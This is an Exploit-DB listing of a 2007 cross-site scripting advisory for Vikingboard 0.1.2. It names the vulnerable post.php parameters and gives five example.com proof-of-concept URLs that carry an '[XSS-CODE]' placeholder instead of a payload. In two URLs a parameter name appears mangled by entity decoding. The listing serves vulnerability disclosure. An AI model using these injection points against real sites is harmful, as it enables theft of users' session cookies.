Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS

2007-07-25T00:00:00
ID EDB-ID:30385
Type exploitdb
Reporter Lostmon
Modified 2007-07-25T00:00:00

Description

Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS. CVE-2007-4088 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/25056/info
  
Vikingboard is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting this issue could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
  
Vikingboard 0.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0

http://www.example.com/viking/post.php?mode=03&t=2"e=2[XSS-CODE]

http://www.example.com/viking/post.php?mode=03&t=2[XSS-CODE]"e=2

http://www.example.com/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]

http://www.example.com/viking/post.php?mode=02&p=2[XSS-CODE]